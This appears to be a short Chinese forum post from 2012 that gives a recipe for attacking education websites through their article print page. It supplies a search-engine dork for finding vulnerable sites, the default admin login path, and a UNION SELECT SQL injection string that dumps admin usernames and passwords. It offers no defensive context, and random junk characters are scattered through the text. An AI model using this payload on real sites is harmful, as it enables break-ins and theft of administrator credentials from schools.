教育站打印页面漏洞1 ~1 o# I6 x* z7 h+ _
百度或google搜索 inurl:info_Print.asp?ArticleID=. C8 v7 G% v. O4 M9 ~( [
默认后台:/ad_login.asp
" h1 w$ h6 D1 k3 ]: s+ l爆管理员密码:0 t* o$ d' y8 W) ^6 K
在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可9 k) U( S0 b; t2 F: F& X) m
/ s, q" q+ u- N1 l% y, tunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
6 S3 p3 A, r/ o- Q* B9 z3 T7 P0 R+ D
2 t# L1 y- ^. Q; F0 A3 O作者:佚名 % z+ T' N2 i7 k7 j# b
1 H2 n; g. M2 t
4 C: D ]5 l( m' |- t
|
发表于 2012-10-31 08:37:31
收藏
支持
反对